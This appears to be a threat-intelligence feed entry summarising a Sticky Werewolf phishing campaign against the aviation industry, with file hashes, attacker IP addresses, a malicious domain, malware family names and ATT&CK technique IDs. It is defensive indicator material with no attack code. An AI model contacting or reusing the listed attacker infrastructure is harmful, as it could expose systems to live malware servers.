Today > | 2 Medium vulnerabilities   -   You can now download lists of IOCs here!

Howling at the Inbox: Sticky Werewolf's Latest Malicious Aviation Attacks

June 7, 2024, 8:08 a.m.

Description

Morphisec Labs has been monitoring increased activity associated with Sticky Werewolf, a suspected geopolitical or hacktivist group. While their origin remains unclear, recent techniques suggest espionage and data exfiltration intent. Sticky Werewolf has targeted the aviation industry, employing phishing emails with archive attachments containing LNK files pointing to malicious payloads on WebDAV servers. The infection chain involves executing these LNK files, triggering a process that ultimately injects commodity malware like RATs or stealers to facilitate data theft.

Date

Published: June 7, 2024, 8 a.m.

Created: June 7, 2024, 8 a.m.

Modified: June 7, 2024, 8:08 a.m.

Indicators

d973e7854f10b4d0a1060e55022dceadc51d038cee85d05e2c2c2fd3b40a42be

d6e6c786b793b46a1ee9b18b058e045d0aa1c83aa2b6aa493637f611d654d957

ce2b6d3aad07d3dec2b24f676cc9d2022bab5a086c7e773f9cfa3e7b7dc6d66a

c3efbac8ebffcf3d8178ce23e59f3b4978f5a91bf93773889870d45cc1b554b0

9eddffbef4d9d7329d062db0a93c933104d00f12106bf91fa3b58e8f8b19aa41

3ccbd8bd7424506b26491e5ff5ff55b000adaab1074ccf3b7452d0883f668040

217196571088cfd63105ae836482d742befcb7db37308ce757162c005a5af6ab

1301ec3006ad03742bfaef047aa434320aa0e725a99be5d6be27b955a814fcf4

05880ff0442bbedc8f46076ef56d4d1ffeda68d9ef26b659c4868873fa84c1a9

03ee2011ad671b1781015024ea53edfbff92c28c2b123bba02d6a6f462e74105

94.156.8.211

94.156.8.166

79.132.128.47

document-cdn.org

Attack Patterns

NETWIRE - S0198

DarkTrack

Rhadamanthys Stealer

Ozone RAT

MetaStealer

Sticky Werewolf

T1107

T1202

T1497

T1105

T1036

T1027

T1053

T1566

Additional Informations

Aerospace